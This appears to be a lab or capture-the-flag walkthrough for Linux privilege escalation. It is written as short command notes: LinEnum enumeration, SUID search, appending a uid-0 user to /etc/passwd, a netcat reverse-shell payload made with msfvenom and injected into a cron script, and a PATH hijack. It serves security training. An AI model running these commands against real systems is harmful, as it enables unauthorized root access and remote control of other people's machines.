Room Link:
Enumeration
Download LinEnum Script
Kali
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Login to host
Kali
ssh user3@$VICTIM
Password: password
The target's hostname
There are 8 users
4 shells
Some users can write to passwd file
Abusing SUID/GUID Files
Victim
find / -perm -u=s -type f 2>/dev/null
Running the shell script in user3 home directory gives us root access right away.
Victim
Exploiting Writeable /etc/passwd
Victim
su user7
Password: password
Victim
openssl passwd -1 -salt new 123
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
cat /etc/passwd
Escaping Vi Editor
Victim
su user8
Password: password
Victim
Victim
Exploiting Crontab
Victim
ssh user4@$VICTIM
Password: password
Kali
msfvenom -p cmd/unix/reverse_netcat lhost=$KALI lport=8888 R
Kali
Victim
Add our payload we made in Kali to the script
Victim
echo 'mkfifo /tmp/cibykaz; nc 10.10.185.2 8888 0</tmp/cibykaz | /bin/sh >/tmp/cibykaz 2>&1; rm /tmp/cibykaz' >> /home/user4/Desktop/autoscript.sh
Wait for the script to run and catch the shell on Kali.
Exploiting PATH Variable
Victim
su user5
Password: password
The script in user5 home directory is just doing the command ls.
Victim
cd /home/user5
./script
We now create a script called ls that gives us a bash shell.
Victim
cd /tmp
echo "/bin/bash" > ls
chmod +x ls
Before we change the path we can see ls goes to /bin/ls
Now after running the below command ls is now directed to our script.
Victim
export PATH=/tmp:$PATH
Now the script in user5s directory acts differently, we now have a root shell.
Victim
cd /home/user5
/script
Run the following to reset the path variable.
Victim
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH
